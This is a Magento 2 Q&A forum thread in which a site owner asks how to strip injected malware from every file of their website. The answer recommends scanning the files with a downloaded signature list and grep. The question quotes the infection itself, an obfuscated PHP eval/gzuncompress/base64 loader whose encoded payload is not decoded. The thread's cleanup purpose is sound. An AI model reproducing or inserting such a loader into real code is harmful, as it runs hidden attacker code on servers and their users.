# How to remove malicious code from the each files of the website magento 2?

Tags: magento2, security, script

I am seeing some malicious code in the website. Each files of every folder is affected by this code. How to remove this code from the website?

Is any script to remove or replace this malicious code?

```
<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy4Q248gxUvAavwjhpgWQPO/+ab74ZkdottstN7XVeZkpRKeRnmJIFyUSyJbUqNWGgM3XHXAKSklJSdXDfg0l4t+PZ7XgdrN4Hq1vrKgzfxu/Qii9eBW9C65PjTNvxt+8/f/14fJyD1lDb1iXXKvKHQ2a5VlQNRqj7mqUqqsYTdIVaUCYNajfrRYDiQ5OAXe+LQ0EiZFmhusgx0FMyqkZDNC8k1UpQ1JY504ByDSloYTmzVGkGCbf/QiFQtOMvvx++PjhTkdpFuBK5Kk4Hiarh8L9Z3OeS1nzuddaggfvnaYJk7fC5RG2hRjpSyAp2SqaBLUPWSA7SFESlqUs2upRGyA0SjTEgRqssw/o9opYoCmYQ0OVyeb0IbnHu0cTkcSloXBo06J7bIgiTJoHZFt9HMTKIy8gfDXZIgG+5obgJbOdFb9zr945Bf2TA92vG7sIQrcpNs81O76x3ir7YweEWiOHNVdwpZep9bt+ZXTGggbat1yoBI5ScEm5MPvU8/2zQjaqz/uC86/uj7njiCUmbZVXdnOe4FirYMaQlJzWicrENGJIylhVkg0CaI3NmTFKR/vuflvrkmB1jXjeI3WdRM8YAOG/m+wMpCvZB')));?>
```

Answer (score 1):

You need to download file from [mwscan.s3.amazonaws.com/mwscan.txt](http://mwscan.s3.amazonaws.com/mwscan.txt)

follow below steps

- save file with name mwscan.txt or with other name with txt format.
- Put file into your magento directory root.
- Open terminal and goto magento directory
- fire this command =>   grep -Erlf mwscan.txt filename/directory-name

> grep -Erlf mwscan.txt index.php
>
> grep -Erlf mwscan.txt app

- This will give you result as filenames which have malicious code.

Hope this Helps.

source : https://github.com/gwillem/magento-malware-scanner/blob/master/docs/usage.md

Comment: Thanks @Dharmesh, But I am asking to remove that code.

Comment: You can simply compare file with fresh magento file and remove code

Comment: any other way to remove

Comment: i don't thinks so, because magento also have this type of code to encrypt password, api details etc.  so its better to do this manually . once you get list of files of malicious code,  you can compare files with fresh magento version files.